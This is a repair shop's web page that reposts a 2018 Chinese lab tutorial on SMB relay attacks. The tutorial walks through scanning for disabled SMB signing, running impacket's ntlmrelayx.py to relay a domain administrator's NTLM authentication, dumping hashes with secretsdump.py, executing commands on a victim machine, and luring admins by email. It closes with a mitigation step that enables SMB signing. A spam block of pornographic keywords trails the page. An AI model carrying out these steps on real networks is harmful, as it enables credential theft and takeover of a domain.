錦州市廣廈電腦維修|上門維修電腦|上門做系統|0416-3905144熱誠服務,錦州廣廈維修電腦,公司IT外包服務
topFlag1 設為首頁
topFlag3 收藏本站
 
maojin003 首 頁 公司介紹 服務項目 服務報價 維修流程 IT外包服務 服務器維護 技術文章 常見故障
錦州市廣廈電腦維修|上門維修電腦|上門做系統|0416-3905144熱誠服務技術文章
Windows SMB請求重放攻擊分析

作者: 佚名  日期:2018-07-10 18:05:05   來源: 本站整理

前言
smb中繼或叫smb請求重放攻擊,B是一個smb服務器,A來進行認證,B將A的認證信息轉發到C上,如果A的憑證在C上認證成功就能進行下一步操作,如創建服務執行命令。如果在域中控制了某些常用服務,如:WEB OA系統、文件共享等服務則可以嘗試使用SMB中繼攻擊來引誘域管理員訪問達到獲取其他機器權限的目的。

環境
192.168.123.10 win 7  域管理員(administrator)機器
192.168.123.11 kali linux 攻擊者機器
192.168.123.100 域內普通用戶-受害者機器
攻擊演示
需要smb簽名關閉下才能進行利用,只有windows server的smb簽名是默認開啟的,像Windows 7的簽名默認關閉
可以用nmap探測smb是否關閉
nmap --script smb-security-mode.nse -p445 192.168.123.0/24 --open

下載impacket工具包
git clone https://github.com/CoreSecurity/impacket.git
192.168.123.11(攻擊者機器) 執行
ntlmrelayx.py -tf hosts.txt -socks -smb2support
hosts.txt里面的內容是要進行中繼的IP,機器越多成功率越高,我這里只有一個IP

然后讓192.168.123.10(域管理員機器) 訪問192.168.123.11(攻擊者機器)的共享,可以架設一個web服務器,html頁面里嵌入\\攻擊者地址,我這里為了方便演示就在本地寫一個html

192.168.123.10(域管理員機器)訪問共享時,提示如下說明中繼成功

[*] Authenticating against smb://192.168.123.100 as Z3R0\Administrator SUCCEED [*] SOCKS: Adding Z3R0/ADMINISTRATOR@192.168.123.100(445) to active SOCKS connection. Enjoy
然后在本地會創建一個socks4代理
在 /etc/proxychains.conf 的最后一行填入
socks4  192.168.123.11 1080
配置好socks4代理后攻擊者執行
proxychains python secretsdump.py z3r0/Administrator@192.168.123.100
這樣secretsdump.py發送出的認證數據包經過socks4代理中繼就能成功進行認證

如果不加上其他參數的話ntlmrelayx.py默認會dumphash

先看看視頻效果圖
上傳時 freebuf提示圖片超出大小限制(希望小編能處理下:) ),效果圖地址:/article/UploadPic/2018-7/2018710164730287.gif
原理分析
每一步smb請求都被192.168.123.11(攻擊者機器)轉發到了其他機器上

1. 192.168.123.10(域管理員機器)向192.168.123.11(攻擊者機器)商量smb協議版本

2. 192.168.123.11(攻擊者機器)向192.168.123.100(受害者機器)商量smb協議版本
3.192.168.123.100(受害者機器)向192.168.123.11(攻擊者機器)回答支持smb v2

4.192.168.123.11(攻擊者機器)向192.168.123.10(域管理員機器)回答支持smb v2
協商完就開始認證了

1.192.168.123.10(域管理員機器)向192.168.123.11(攻擊者機器)發出NTLMSSP_NEGOTIATE認證協商請求
2.192.168.123.11(攻擊者機器)向192.168.123.100(受害者機器)發出NTLMSSP_NEGOTIATE認證協商請求
3.192.168.123.100(受害者機器)向192.168.123.11(攻擊者機器)進行響應,響應包里含有challenge

4.同樣192.168.123.11(攻擊者機器)向192.168.123.10(域管理員機器)進行響應,響應包里含有challenge5.192.168.123.10(域管理員機器)收到challenge后用hash將challenge加密,作為NTLM Response字段發送給192.168.123.11(攻擊者機器)

6.同樣,192.168.123.11(攻擊者機器)將域管理員的認證請求也發往192.168.123.100(受害者機器)

在響應包中可以看到已經認證成功了

有了管理員權限就能為所欲為了

因為沒有目標機器密碼所以不能進行正常的smb認證,ntlmrelayx腳本的socks4代理作用就是處理本地發往192.168.123.100 (受害者機器)流量起一個中繼作用,因為已經認證過了就不用再進行認證,密碼隨便填一個就行,使用socks4代理時的smb的身份認證是域管理員。
可以通過創建服務來執行命令,當然ntlmrelayx.py也可以做到.
python ntlmrelayx.py -tf hosts.txt -c 'cmexe /c calc.exe'

當192.168.123.10(域管理員機器)再次訪問共享時,192.168.123.100(受害者機器)上可以看到calc已經運行了

總結
1.可以通過給域管理員發送郵件的方式來讓他觸發smb請求
2.當然如果域管理員觸發了smb中繼請求了也可以針對他所在那一臺機器做中繼,這樣就能執行命令抓lsass.exe進程中的明文密碼了
修復建議
將注冊表項”RequireSecuritySignature”設置為 1 可以啟用 SMB 簽名
powershell執行
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanWorkstation\Parameters" RequireSecureNegotiate -Value 1 –Force
 



熱門文章
  • 機械革命S1 PRO-02 開機不顯示 黑...
  • 聯想ThinkPad NM-C641上電掉電點不...
  • 三星一體激光打印機SCX-4521F維修...
  • 通過串口命令查看EMMC擦寫次數和判...
  • IIS 8 開啟 GZIP壓縮來減少網絡請求...
  • 索尼kd-49x7500e背光一半暗且閃爍 ...
  • 樓宇對講門禁讀卡異常維修,讀卡芯...
  • 新款海信電視機始終停留在開機界面...
  • 常見打印機清零步驟
  • 安裝驅動時提示不包含數字簽名的解...
  • 共享打印機需要密碼的解決方法
  • 圖解Windows 7系統快速共享打印機的...
  • 錦州廣廈電腦上門維修

    報修電話:13840665804  QQ:174984393 (聯系人:毛先生)   
    E-Mail:174984393@qq.com
    維修中心地址:錦州廣廈電腦城
    ICP備案/許可證號:遼ICP備2023002984號-1
    上門服務區域: 遼寧錦州市區
    主要業務: 修電腦,電腦修理,電腦維護,上門維修電腦,黑屏藍屏死機故障排除,無線上網設置,IT服務外包,局域網組建,ADSL共享上網,路由器設置,數據恢復,密碼破解,光盤刻錄制作等服務

    技術支持:微軟等
    主站蜘蛛池模板: 亚洲中文字幕无码久久| 无码一区二区三区免费| 无码无需播放器在线观看| 亚洲精品无码专区在线| 国产av无码专区亚洲国产精品| 亚洲精品无码专区久久久| 在线无码视频观看草草视频 | 最新中文字幕AV无码不卡| 无码伊人66久久大杳蕉网站谷歌| 色欲aⅴ亚洲情无码AV| 无码av免费网站| 久久精品无码一区二区日韩AV| 人妻夜夜添夜夜无码AV| 八戒理论片午影院无码爱恋| 九九在线中文字幕无码| 无码人妻精品一区二区三区在线| 国产精品无码无片在线观看3D| 久久久久亚洲av无码专区喷水| 精品无码综合一区| 国产精品无码久久久久久久久久| 精品无码国产污污污免费网站| 人妻系列AV无码专区| 中文字幕丰满乱子无码视频| 永久免费无码网站在线观看个| 亚洲AV无码精品国产成人| 中文午夜人妻无码看片| 久久午夜无码鲁丝片秋霞| 亚洲AV人无码综合在线观看| 亚洲av日韩av无码黑人| 国产AV巨作情欲放纵无码| 亚洲中文字幕无码不卡电影| 国产精品午夜福利在线无码| yy111111少妇影院无码| 国产午夜无码视频免费网站| 精品久久久久久无码人妻中文字幕 | 日韩精品无码一区二区中文字幕| 中出人妻中文字幕无码| 亚洲日韩欧洲无码av夜夜摸| 亚洲AV中文无码字幕色三| 亚洲av无码专区在线播放| 久久精品无码专区免费东京热|